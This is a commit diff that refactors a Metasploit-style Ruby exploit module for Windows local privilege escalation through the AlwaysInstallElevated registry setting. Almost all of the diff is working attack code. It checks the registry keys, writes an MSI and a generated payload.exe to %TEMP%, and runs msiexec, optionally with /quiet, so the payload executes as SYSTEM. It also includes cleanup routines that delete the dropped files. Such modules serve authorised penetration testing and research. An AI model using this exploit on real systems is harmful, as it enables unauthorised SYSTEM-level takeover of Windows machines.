Final cleanup on always_install_elevated

jvazquez-r7 · jvazquez-r7 · commit 85ed07467483 · 2012-11-28T21:50:08.000+01:00
diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb
@@ -23,16 +23,15 @@ def initialize(info={})
 		super(update_info(info, {
 			'Name'          => 'Windows AlwaysInstallElevated MSI',
 			'Description'    => %q{
-				This module checks the AlwaysInstallElevated registry keys which
-				dictate if .MSI files should be installed with elevated privileges
-				(NT AUTHORITY\SYSTEM).
+					This module checks the AlwaysInstallElevated registry keys which dictate if
+				.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
 
-				The default MSI file is data/exploits/exec_payload.msi with the WiX source
-				file under external/source/exploits/exec_payload_msi/exec_payload.wxs.
-				This MSI simply executes payload.exe within the same folder.
+				The default MSI file is data/exploits/exec_payload.msi with the WiX source file
+				under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
+				executes payload.exe within the same folder.
 
-				The MSI may not execute succesfully successive times, but may be able to
-				get around this by regenerating the MSI.
+				The MSI may not execute succesfully successive times, but may be able to get around
+				this by regenerating the MSI.
 
 				MSI can be rebuilt from the source using the WIX tool with the following commands:
 				candle exec_payload.wxs
@@ -90,85 +89,90 @@ def check
 		else
 			print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
 			current_user_value = registry_getvaldata(hkcu,install_elevated)
+		end
 
-			if current_user_value.nil?
-				print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
-				return Msf::Exploit::CheckCode::Safe
-			elsif current_user_value == 0
-				print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
-				return Msf::Exploit::CheckCode::Safe
-			else
-				print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
-				return Msf::Exploit::CheckCode::Vulnerable
-			end
+		if current_user_value.nil?
+			print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
+			return Msf::Exploit::CheckCode::Safe
+		elsif current_user_value == 0
+			print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+			return Msf::Exploit::CheckCode::Safe
+		else
+			print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+			return Msf::Exploit::CheckCode::Vulnerable
 		end
 	end
 
 	def cleanup
-		if @executed
-			begin
-				print_status("Deleting MSI...")
-				file_rm(@msi_destination)
-			rescue Rex::Post::Meterpreter::RequestError => e
-				print_error(e.to_s)
-				print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
-			end
-
-			begin
-				print_status("Deleting Payload...")
-				file_rm(@payload_destination)
-			rescue Rex::Post::Meterpreter::RequestError => e
-				print_error(e.to_s)
-				print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
-			end
+		if not @executed
+			return
+		end
+
+		begin
+			print_status("Deleting MSI...")
+			file_rm(@msi_destination)
+		rescue Rex::Post::Meterpreter::RequestError => e
+			print_error(e.to_s)
+			print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
+		end
+
+		begin
+			print_status("Deleting Payload...")
+			file_rm(@payload_destination)
+		rescue Rex::Post::Meterpreter::RequestError => e
+			print_error(e.to_s)
+			print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
 		end
 	end
 
 	def exploit
-		@executed = false
-		if check == Msf::Exploit::CheckCode::Vulnerable
-			@executed = true
-
-			msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
-			msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
-
-			# Upload MSI
-			@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
-			print_status("Uploading the MSI to #{@msi_destination} ...")
-
-			#upload_file - ::File.read doesn't appear to work in windows...
-			source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
-			write_file(@msi_destination, source)
-
-			# Upload payload
-			payload = generate_payload_exe
-			@payload_destination = expand_path("%TEMP%\\payload.exe").strip
-			print_status("Uploading the Payload to #{@payload_destination} ...")
-			write_file(@payload_destination, payload)
-
-			# Execute MSI
-			print_status("Executing MSI...")
-
-			if datastore['LOG_FILE'].nil?
-				logging = ""
-			else
-				logging = "/l* #{datastore['LOG_FILE']} "
-			end
-
-			if datastore['QUIET']
-				quiet = "/quiet "
-			else
-				quiet = ""
-			end
-
-			cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
-			vprint_status("Executing: #{cmd}")
-			begin
-				result = cmd_exec(cmd)
-			rescue Rex::TimeoutError
-				vprint_status("Execution timed out.")
-			end
-			vprint_status("MSI command-line feedback: #{result}")
+
+		if check != Msf::Exploit::CheckCode::Vulnerable
+			@executed = false
+			return
+		end
+
+		@executed = true
+
+		msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+		msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+
+		# Upload MSI
+		@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+		print_status("Uploading the MSI to #{@msi_destination} ...")
+
+		#upload_file - ::File.read doesn't appear to work in windows...
+		source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
+		write_file(@msi_destination, source)
+
+		# Upload payload
+		payload = generate_payload_exe
+		@payload_destination = expand_path("%TEMP%\\payload.exe").strip
+		print_status("Uploading the Payload to #{@payload_destination} ...")
+		write_file(@payload_destination, payload)
+
+		# Execute MSI
+		print_status("Executing MSI...")
+
+		if datastore['LOG_FILE'].nil?
+			logging = ""
+		else
+			logging = "/l* #{datastore['LOG_FILE']} "
+		end
+
+		if datastore['QUIET']
+			quiet = "/quiet "
+		else
+			quiet = ""
+		end
+
+		cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
+		vprint_status("Executing: #{cmd}")
+		begin
+			result = cmd_exec(cmd)
+		rescue Rex::TimeoutError
+			vprint_status("Execution timed out.")
 		end
+		vprint_status("MSI command-line feedback: #{result}")
 	end
 end
